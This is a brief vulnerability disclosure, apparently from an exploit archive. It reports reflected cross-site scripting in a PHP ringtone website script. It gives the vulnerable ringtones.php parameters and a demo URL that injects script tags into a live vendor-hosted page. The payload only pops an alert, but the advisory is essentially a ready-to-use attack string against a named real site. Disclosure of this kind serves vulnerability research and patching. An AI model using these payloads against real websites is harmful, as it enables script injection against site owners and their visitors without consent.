PHP Ringtone Website script suffers from a cross site scripting vulnerability.
829fca050e5207aa2b6c758709efe6b4dd0f310a7c3c7326214d09b4aa12536c############################################################################
#
# Exploit Title: PHP Ringtone Website
# Date: 14/01/2012
# Author: Atmon3r
# Discovered By: Atmon3r
# Software Link: http://www.e-soft24.com/php-ringtone-website-p-351.html
# Version: All Version
# Security Risk:: Low
# Tested on: GNU/Linux Ubuntu
#
############################################################################
#
# Exploit:
#
http://www.website.com/[path]/ringtones.php?mmchar0_1=[xss]&mmstart0_1=1&mmsection0_1=[xss]
#
############################################################################
#
# Demo:
#
http://www.e-soft24.com/ringtones/ringtones.php?mmchar0_1=G/"><script>alert('Xss
By Atm0n3r')</script>&mmstart0_1=1&mmsection0_1=/"><script>alert('Xss By
Atm0n3r')</script>
#
############################################################################
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed